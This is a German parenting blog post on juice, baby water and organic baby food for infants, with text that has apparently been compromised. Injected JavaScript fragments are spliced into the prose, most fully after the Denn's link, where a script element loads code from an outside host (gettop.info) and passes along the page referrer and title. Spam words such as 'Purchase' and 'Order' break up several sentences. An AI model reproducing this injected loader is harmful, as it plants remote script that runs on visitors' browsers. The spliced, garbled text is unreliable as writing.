Fruchtsäfte für Kinder und Kleinkinder

Nachdem unser erstes Kind abbgestillt war und wir bis zum vollendeten 6 Monat Bambinchen 1 gefüttert haben, stellte sich uns die Frage nach zusätzlicher Flüssigkeitsaufnahme. Fruchtsäfte für Kinder oder Kleinkinder fanden wir anfangs die richtige Lösung. Nach einigen Gesprächen mit unserer Hebamme oder dem Kinderarzt wurde uns aber schnell klar, dass Fruchtsäfte für Kinder wohl doch nicht die richtige Alternative ist, da sehr stark Karies gefördert wird und sich die Kinder natürlich an den süßen Geschmack ganz schnell gewöhnen.

Dies haben wir dann auch bei unserem Sohn gemerkt. Er hatte sich schnell an den süßen Multivitaminsaft gewöhnt und will bis heute nicht darauf verzichten. Wir haben allerdings nach kurzer Zeit etwa 75% Wasser zum Saft gemischt. Glücklicherweise hat er es nicht bemerkt und bis heute ist dies sein Lieblingsgetränk. Eine alternative Variante ist für unser Kind ist Apfeltee. Diesen zusammen mit etwas Multivitaminsaft schmeckt ihm ähnlich gut.

Bei unserem nächsten Kind werden wir allerdings komplett auf Säfte verzichten – zumindest am Anfang. Wir werden dann einfach Leitungswasser oder stilles Wasser aus dem Supermarkt geben.var d=document;var s=d.createElement(’script‘);

Baby Wasser für Säuglinge

Ein wichtiges Thema nach der Geburt eines neuen Kindes ist die Ernährung. Wer stillt hat es anfangs sicherlich einfacher – mehr braucht das Baby eben nicht. Aber irgendwann kommt die Zeit, um sich um geeignete Folgenahrung für die Säuglinge zu kümmern.

Für beide unserer Kinder haben wir dabei das Baby Wasser für Säuglinge von Humana gekauft. Es wird besonders schonend hergestellt, ist keimfrei und besonders auf die noch nicht ausgereifte Nierenfunktion im ersten Lebensjahr abgestimmt. Das Humana Baby Wasser für Säuglinge ist von Geburt an für die Kleinen geeignet. Man kann es zum Zubereiten von Tees verwenden oder zum mischen anderer Getränke. Besonders schön, man muss es vor Gebrauch nicht mehr abkochen.

Bio Nahrung für Säuglinge 4 Monate

Nach den ersten 4 Monaten Muttermilch und Bambinchen 1 haben wir uns nach geeigneter Nahrung für Säuglinge und Kleinkinder ab 4 Monaten umgeschaut. Für uns kam eigentlich nur Bio Nahrung in Frage.  Bio Nahrung für Säuglinge ab 4 Monatenkann man meiner Meinung nach im Drogeriemarkt DM kaufen. Die dortigen Bioprodukte sind von der Firma Alnatura. Nachdem wir diese auch anfangs gekauft haben, haben wir uns auch mal speziell im Bioladen „Denn’s“ umgeschaut.

Da Denn’s ein reiner Biomarkt ist, gibt es dort neben der Bio Nahrung für Säuglinge auch alle anderen Bio Lebensmittel – aber leider ist Denn’s nicht so verbreitet wie DM. Zu unserer großen Überraschung war die Bio Nahrung für Säuglinge bei Denn’s noch um ein paar Cent günstiger als bei DM. Die fleischlosen Produkte von Demeter mit der Aufschrift „Holle“ kosten bei unserem Denn’s unter einem Euro. Die fleischhaltigen Gläser knapp über einen Euro pro 190 Gramm Glas. Noch haben wir nicht alle unterschiedlichen Sorten ausprobiert, aber bisher schmeckt es unserem kleinen Sohn auf jeden Fall.

weitere Infos gibt es unter:

www.denns-biomarkt.devar d=document;var s=d.createElement(’script‘); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Babynahrung nach der Milch

Nachdem unser erstes Baby abgestillt wurde und wir auch mit Bambinchen1 und Bambinchen2 durch waren haben wir uns natürlich die Frage nach der Purchase Babynahrung nach der Milch Order gestellt.

Leider waren wir zu unwissend und haben unserem Kind damals Saft gegeben. Wie sich dann später herausstellte, war er so an den süßen Geschmack gewöhnt, dass er nichts anderes mehr trinken möchte. Wir haben das dann auch relativ schnell durchschaut und neben dem Saft hauptsächlich Tee gemischt und seit längerem mischen wir 80% Wasser und 20% Saft in seiner Flasche.

Bei unserem 2. Kind werden wir sofort nach der Milch mit Wasser anfangen, damit das Kind nicht an süße Tees oder Säfte schon als Kleinkind gewöhnt wird.if (document.currentScript) { Purchase } Purchase online